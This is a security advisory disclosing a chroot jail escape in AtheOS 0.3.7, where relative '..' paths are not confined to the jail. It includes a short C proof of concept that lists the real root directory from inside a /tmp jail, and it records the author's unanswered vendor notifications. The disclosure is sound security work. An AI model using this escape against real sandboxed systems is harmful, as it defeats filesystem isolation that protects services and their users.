AtheOS: escaping from a chroot jail

                          -------( AtheOS )-------

AtheOS is a free desktop operating system under the GPL license. AtheOS
currently run on Intel, AMD and other compatible processors and support the
Intel Multi Processor architecture.

AtheOS home page is : http://www.atheos.cx

                       -------( Vulnerability )-------

A chroot() call is implemented in AtheOS, and its behavior is supposed to
be POSIX conformant. Once chroot(<directory>) is issued by a process,
<directory> should become the base directory ('/') with no way to go out of
the jail. That feature is widely used to protect applications against
unwanted directory traversals (ftp, http, etc.) .

After a chroot() call on AtheOS, '/' indeed seems to become the base
directory. '/path/to/file' is translated to '<directory>/path/to/file' .

Unfortunately, relative paths aren't checked against the current chroot
jail. Therefore, '../../../../path/to/file' will be translated to a file out
of the chroot limits.

                     -------( Affected versions )-------

Version 0.3.7 seems to be affected by that bug. I didn't check any prior
release, but they may be vulnerable as well.

                  -------( Simple proof of concept )-------

The following code will read the content of the real '/' directory, while
'/tmp' is supposed to be the base of the chroot jail.

#include <stdio.h>
#include <unistd.h>
#include <dirent.h>

int main(void)
{
    register DIR *d;
    register const struct dirent *e;

    if (chdir("/") || chroot("/tmp") || chdir("/") ||
        (d = opendir("..")) == NULL) {
        return 1;
    }
    while ((e = readdir(d)) != NULL) {
        puts(e->d_name);
    }
    return 0;
}

                    -------( Vendor notification )-------

I reported the problem to the AtheOS maintainer <kurt@atheos.cx> on
January 2nd. The mail bounced (message id: 20020102235031.A20057@c9x.org) on
January 10th.

I sent back another mail to <webmaster@atheos.cx> (message id :
20020110000235.GA31372@c9x.org) . The mail bounced on January 17th.

I finally sent a mail to the AtheOS-Developer mailing-list. No one ever
answered.

                          -------( Impact )-------

Don't trust chroot() on AtheOS. Users can traverse directories.

Best regards,

             -Frank.

--
__ /*-      Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\ __
\ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
\/ <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software